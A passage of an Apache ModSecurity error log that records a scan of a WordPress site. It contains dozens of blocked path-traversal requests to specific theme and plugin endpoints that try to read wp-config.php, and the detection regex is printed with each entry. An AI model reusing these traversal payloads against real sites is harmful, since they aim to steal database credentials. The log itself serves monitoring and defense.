"ZN-wQEWc94tsnIsHAQ-XMgAAAMM"] [Fri Aug 18 12:54:08.616185 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:34866] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download/download.php"] [unique_id "ZN-wQEWc94tsnIsHAQ-XMwAAANI"] [Fri Aug 18 12:54:08.711130 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:34868] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/inc/download.php"] [unique_id "ZN-wQEWc94tsnIsHAQ-XNAAAAMU"] [Fri Aug 18 12:54:08.806124 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:34870] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/view-pdf.php"] [unique_id "ZN-wQEWc94tsnIsHAQ-XNQAAAMk"] [Fri Aug 18 12:54:08.901199 2023] [:error] [pid 18872:tid 140103334733568] [client 87.249.132.213:34872] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/scripts/download.php"] [unique_id "ZN-wQPG_rKmCSnA6LxD5agAAAAs"] [Fri Aug 18 12:54:09.006486 2023] [:error] [pid 18874:tid 140103234021120] [client 87.249.132.213:34876] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/download.php"] [unique_id "ZN-wQVxvK4MFoveIP9_KhQAAAJc"] [Fri Aug 18 12:54:09.100803 2023] [:error] [pid 18873:tid 140103309555456] [client 87.249.132.213:34878] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/downloadlink.php"] [unique_id "ZN-wQbCcrCl0jrDdhfxXDwAAAE4"] [Fri Aug 18 12:54:09.195207 2023] [:error] [pid 18874:tid 140103309555456] [client 87.249.132.213:34880] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/functions/download.php"] [unique_id "ZN-wQVxvK4MFoveIP9_KhgAAAI4"] [Fri Aug 18 12:54:09.290594 2023] [:error] [pid 18872:tid 140103499544320] [client 87.249.132.213:34882] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "ZN-wQfG_rKmCSnA6LxD5awAAAAA"] [Fri Aug 18 12:54:09.385630 2023] [:error] [pid 18872:tid 140103359911680] [client 87.249.132.213:34884] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/css/css.php"] [unique_id "ZN-wQfG_rKmCSnA6LxD5bAAAAAg"] [Fri Aug 18 12:54:09.479993 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:34886] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/framework/utilities/download/getfile.php"] [unique_id "ZN-wQUWc94tsnIsHAQ-XNgAAAM4"] [Fri Aug 18 12:54:27.280430 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:34956] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XQQAAANI"] [Fri Aug 18 12:54:27.389642 2023] [:error] [pid 19445:tid 140103284377344] [client 87.249.132.213:34958] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Predicate.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XQgAAANE"] [Fri Aug 18 12:54:27.498892 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:34960] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Reader.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XQwAAAMg"] [Fri Aug 18 12:54:27.627971 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:34962] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Writer.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XRAAAAMQ"] [Fri Aug 18 12:54:27.734393 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:34964] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Enigma2.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XRQAAANU"] [Fri Aug 18 12:54:27.843483 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:34966] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/abtest/abtest_admin.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XRgAAAMY"] [Fri Aug 18 12:54:27.948011 2023] [:error] [pid 19445:tid 140103491151616] [client 87.249.132.213:34968] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-custom-fields/core/actions/export.php"] [unique_id "ZN-wU0Wc94tsnIsHAQ-XRwAAAME"] [Fri Aug 18 12:54:28.069785 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:34970] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XSAAAAMs"] [Fri Aug 18 12:54:28.173595 2023] [:error] [pid 19445:tid 140103259199232] [client 87.249.132.213:34972] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XSQAAANQ"] [Fri Aug 18 12:54:28.272279 2023] [:error] [pid 19445:tid 140103242413824] [client 87.249.132.213:34974] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XSgAAANY"] [Fri Aug 18 12:54:28.370042 2023] [:error] [pid 19445:tid 140103292770048] [client 87.249.132.213:34976] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XSwAAANA"] [Fri Aug 18 12:54:28.477600 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:34980] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XTAAAANI"] [Fri Aug 18 12:54:28.597026 2023] [:error] [pid 